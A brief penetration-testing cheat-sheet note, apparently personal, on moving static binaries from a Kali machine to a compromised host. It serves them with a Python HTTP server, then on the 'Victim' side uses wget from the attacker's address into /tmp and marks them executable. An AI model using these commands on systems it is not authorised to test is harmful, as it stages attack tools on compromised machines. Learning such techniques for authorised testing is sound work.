Last updated 9 months ago
I made a branched of it just in case
Kali
git clone https://github.com/andrew-d/static-binaries.git cd static-binaries/binaries/$lookForBinaryYouWant/ python2 -m SimpleHTTPServer 81
Victim
cd /tmp/ wget http://$KALI:81/$binaryYouWant chmod +x $binaryYouWant